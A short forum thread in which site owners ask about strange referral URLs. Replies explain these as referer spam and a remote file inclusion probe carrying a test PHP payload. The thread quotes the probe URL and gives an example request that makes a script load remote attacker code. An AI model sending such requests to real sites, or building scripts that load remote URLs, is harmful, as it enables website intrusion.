couple refferals questions

hi,

what does it mean when theres an url after your url in the page column of the refferals tab?

ex: archive/?pg=http%3A%2F%2Fwww.alonsaunet.com%2Fwebmaster%2Fromi%2Fjirudog%2F

Also what does it mean when theres an url thats not a search engine in the refferals column that doesnt have a link to your site?

is it some kind of spam

I too had that one in my logs this afternoon, plus about 100 page hits from that ‘visitor’. The URL in question contains just one line of php code: <?php echo md5("just_a_test");?> I don’t know what it’s trying to do…

Also what does it mean when theres an url thats not a search engine in the refferals column that doesnt have a link to your site?

Referer spam.

Re: couple refferals questions

The URL was likely from a script kiddie trying to exploit your site, hence the “just a test” code. Nothing to be worried about in this case, since your site won’t load the URL’s PHP. However, if you had a script installed that loaded GET urls (eg. http://example.com/load_me.php?url=http://example.net/hax0rz.php, then you’d have a problem.
